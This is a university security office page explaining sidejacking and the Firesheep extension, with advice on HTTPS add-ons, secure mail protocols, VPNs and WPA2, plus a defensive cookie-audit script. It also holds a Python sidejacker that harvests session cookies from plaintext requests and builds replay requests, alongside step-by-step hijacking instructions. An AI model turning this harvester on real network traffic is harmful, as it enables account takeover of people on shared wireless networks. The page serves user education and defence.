Loyola University Chicago


University Information Security Office

Firesheep and Sidejacking



Firesheep update, 11-15-2010:

- Gmail and Amazon have since fixed the security of their websites and are no longer affected by this exploit.

- Hotmail has given users the option to turn on HTTPS for Hotmail accounts. Turn it on in your account's settings.

 

 

What is sidejacking?

 

When you log in to a website you usually start by submitting your username and password. The server checks whether an account matching those credentials exists and, if so, replies with a session "cookie". Your browser then attaches that cookie to every subsequent request to the site, and the cookie alone is what tells the server it is still you.

 

It is extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for them to encrypt everything else. That leaves the cookie (and the user) exposed. HTTP session hijacking, sometimes called "sidejacking", is when an attacker obtains a user's session cookie and presents it to the site as their own. Because the cookie is all the server uses to recognize the user, the attacker can then do anything that user can do on that website, without ever learning the password. On an open wireless network the cookie is broadcast in the clear to everyone in radio range, which makes these attacks trivial.

 

This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix is full end-to-end encryption, known on the web as HTTPS or SSL, applied to every page that carries the session cookie and not just to the login form. Facebook keeps rolling out new "privacy" features in an endless attempt to quell the complaints of unhappy users, but what is the point when someone can simply take over an account entirely? Twitter forced all third-party developers to use OAuth and then immediately released (and promoted) a new version of its insecure website. When it comes to user privacy, SSL is the elephant in the room.
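Whether a site has actually applied "full end-to-end encryption" to its session, rather than only to the login form, can be checked from the response it sends after a successful login. The following Python script is an added example, not code from this page or from Firesheep. The two responses it inspects are constructed samples, and the list of session-cookie names is an assumption made for illustration. It flags a session cookie that is set without the Secure attribute (without it the browser will send the cookie on any plain http:// request to the site, which is exactly what sidejacking exploits, even if the login itself went over HTTPS) and a post-login redirect that drops the user back to http://.

```python
"""Audit a login response for the things that keep a session cookie off
plaintext HTTP.  Added example, not from the original page or from Firesheep.
The responses and the cookie-name list below are constructed for illustration."""

# Constructed sample: a site that logs in over HTTPS but then sets its session
# cookie without the Secure attribute and sends the user back to plain HTTP.
RESPONSE_BEFORE = """HTTP/1.1 302 Found
Location: http://www.example.com/home
Set-Cookie: sessionid=a1b2c3d4; Path=/; HttpOnly
Set-Cookie: lang=en; Path=/
"""

# The same site after the fix: the session cookie is Secure, so the browser will
# only ever send it over HTTPS, and the redirect stays on https://.
RESPONSE_AFTER = """HTTP/1.1 302 Found
Location: https://www.example.com/home
Set-Cookie: sessionid=a1b2c3d4; Path=/; Secure; HttpOnly
Set-Cookie: lang=en; Path=/
"""

# Assumed names of cookies that carry the login; a real audit would take the
# names from the application under test.
SESSION_COOKIE_NAMES = {"sessionid", "phpsessid", "jsessionid"}


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attribute: value}).
    Attributes without a value (Secure, HttpOnly) map to True."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() or True
    return name.strip(), value, attrs


def audit_response(raw_response):
    """Return a list of (cookie name or marker, finding code) for one response."""
    findings = []
    # Skip the status line; the samples have no body, so every other line is a header.
    for line in raw_response.splitlines()[1:]:
        if not line.strip():
            break
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "location" and value.lower().startswith("http://"):
            # After login the user is sent to a plain-HTTP page, so every
            # cookie the browser is willing to send over HTTP goes with them.
            findings.append(("<redirect>", "http-redirect"))
        elif field == "set-cookie":
            name, _, attrs = parse_set_cookie(value)
            if name.lower() not in SESSION_COOKIE_NAMES:
                continue  # only the session cookie gives away the login
            if "secure" not in attrs:
                findings.append((name, "no-secure-flag"))
    return findings


if __name__ == "__main__":
    print("before:", audit_response(RESPONSE_BEFORE))
    print("after: ", audit_response(RESPONSE_AFTER))
```

The Secure attribute is the server-side counterpart of what a browser add-on that forces HTTPS does on the client: it stops the cookie from ever appearing in a plaintext request, so a sniffer on the wireless network sees the request but not the credential.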

 

What is Firesheep?

 

A Firefox extension designed to demonstrate sidejacking. It listens for unencrypted HTTP traffic on the local network, recognizes the session cookies of a set of popular websites, and lets its user take over any session it sees with a single click.

 

How can users protect themselves against Firesheep?

 

• Several Firefox add-ons force connections to HTTPS whenever the website supports it, so the connection stays encrypted after you log in instead of dropping back to plain HTTP for the pages that carry your session cookie. ITS recommends using Force TLS or HTTPS Everywhere with Firefox. These add-ons protect you from prying eyes on Loyola's network or any other, but only for websites that offer HTTPS at all; a site that serves its logged-in pages over plain HTTP only cannot be fixed from the browser side. For more information, go to Browser Safety: http://luc.edu/uiso/security_tools.shtml

 

• Use the secure version of each network service when you are on an unsecured wireless connection. Plain POP, IMAP and FTP send your username and password, and everything that follows, in cleartext, so anyone on the same open network can capture them. Configure your email client to use their secure alternatives, POPS and IMAPS (POP and IMAP over SSL/TLS), and transfer sensitive files with FTPS or SFTP rather than FTP.

 

• To use the secure alternative of IMAP (IMAPS) with Loyola’s network please visit http://www.luc.edu/its/email_imap.shtml.

 

• If you have access to the LUC VPN, connecting to it encrypts all of your Internet traffic between your computer and the VPN gateway, so anyone sharing the wireless network with you sees only the VPN tunnel. Any website, email server or FTP site you access through the VPN is protected from local eavesdropping. The protection ends at the VPN gateway: from there on, traffic travels as the protocol sends it, so an unencrypted website is still unencrypted past the VPN, just no longer visible on the wireless network.

 

• Use a secured wireless network, meaning one encrypted with WPA or WPA2. Wireless encryption protects the radio link, so other people in range cannot simply capture your web, email and FTP traffic out of the air. Two limits apply: the encryption stops at the access point, so an unencrypted protocol is still unencrypted on the network beyond it, and on a network protected by a shared password (WPA/WPA2-PSK) anyone who knows that password and captures the start of your connection can decrypt your traffic. WPA2 with per-user logins (WPA2-Enterprise) does not have the second problem.

 

• NOTE: Do not use WEP encryption on your wireless access points. WEP can be cracked in minutes, after which every station's traffic is readable, which is no better than an open network.

 

How it works

 

After installing the extension you will see a new sidebar in Firefox. Connect to any busy open Wi-Fi network, click the big "Start Capturing" button, and wait.

As soon as anyone on the network visits an insecure website that Firesheep knows about, Firesheep reads the session cookie out of their plaintext HTTP traffic and shows their name and photo in the sidebar.

Double-click on someone and you are instantly logged in as them: Firesheep simply presents the captured cookie to the site as if it were your own.

That's it. Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.
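The capture-and-replay sequence described above, and the cookie theft described under "What is sidejacking?", as an added example in Python. This is not Firesheep's own code; it is a model of the technique. It works on a constructed table of known sites and a constructed list of plaintext requests rather than a live capture, and the host names and cookie names are assumptions made for illustration. In a real tool the request list would be fed from a packet capture on the wireless interface; everything from that point on is the same, because the cookie is the credential.

```python
"""A Firesheep-style sidejacker in miniature: match plaintext HTTP requests
against a table of known sites and lift the cookies that carry the session.
Added example, not Firesheep's code.  Handler table, host names, cookie names
and the captured requests are all constructed for illustration."""

# Constructed handler table: domain -> the cookie names that make up a session.
# Firesheep ships one such handler per supported site.
HANDLERS = {
    "social.example": {"session_id", "user_id"},
    "shop.example": {"cart_session"},
}

# Constructed plaintext requests as they would be seen on an open wireless network.
CAPTURED_REQUESTS = [
    b"GET /home HTTP/1.1\r\nHost: www.social.example\r\n"
    b"Cookie: session_id=9f3c2a; user_id=1042; theme=dark\r\n\r\n",
    # shop.example set cart_session with the Secure attribute, so the browser
    # only sends it over HTTPS; this plaintext request carries nothing useful.
    b"GET /images/logo.png HTTP/1.1\r\nHost: static.shop.example\r\n"
    b"Cookie: lang=en\r\n\r\n",
    # A site with no handler is ignored even though it leaks a cookie.
    b"GET /search?q=x HTTP/1.1\r\nHost: search.other.example\r\n"
    b"Cookie: sid=abc\r\n\r\n",
]


def parse_request(raw):
    """Return (method, path, headers) for one raw HTTP/1.1 request; header names lower-cased."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookie_header(value):
    """'a=1; b=2' -> {'a': '1', 'b': '2'}"""
    cookies = {}
    for pair in value.split(";"):
        name, _, val = pair.strip().partition("=")
        if name:
            cookies[name] = val
    return cookies


def match_handler(host):
    """Return the handler domain that covers this Host header, or None."""
    for domain in HANDLERS:
        if host == domain or host.endswith("." + domain):
            return domain
    return None


def harvest_sessions(requests):
    """Return {domain: session cookies} for each request that exposes a full session."""
    sessions = {}
    for raw in requests:
        _method, _path, headers = parse_request(raw)
        domain = match_handler(headers.get("host", ""))
        if domain is None:
            continue
        cookies = parse_cookie_header(headers.get("cookie", ""))
        wanted = HANDLERS[domain]
        if wanted.issubset(cookies):  # every session cookie travelled in the clear
            sessions[domain] = {name: cookies[name] for name in wanted}
    return sessions


def build_replay_request(domain, cookies, path="/"):
    """The 'double-click' step: the request the attacker's browser would send,
    carrying the stolen cookies.  Built as bytes only; nothing is sent."""
    cookie_header = "; ".join(f"{n}={v}" for n, v in sorted(cookies.items()))
    return (f"GET {path} HTTP/1.1\r\nHost: www.{domain}\r\n"
            f"Cookie: {cookie_header}\r\n\r\n").encode()


if __name__ == "__main__":
    for domain, cookies in harvest_sessions(CAPTURED_REQUESTS).items():
        print(domain, cookies)
        print(build_replay_request(domain, cookies).decode())
```

Note that the harvester only reports a session when every cookie the handler needs is present in the clear. That is why the shop.example request yields nothing: a session cookie set with the Secure attribute never leaves the browser over plain HTTP, which is the server-side fix the rest of this page argues for.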

 

Information Technology Services
1032 W. Sheridan Ave. · Chicago, IL 60660 · 773.508-7373
DataSecurity@luc.edu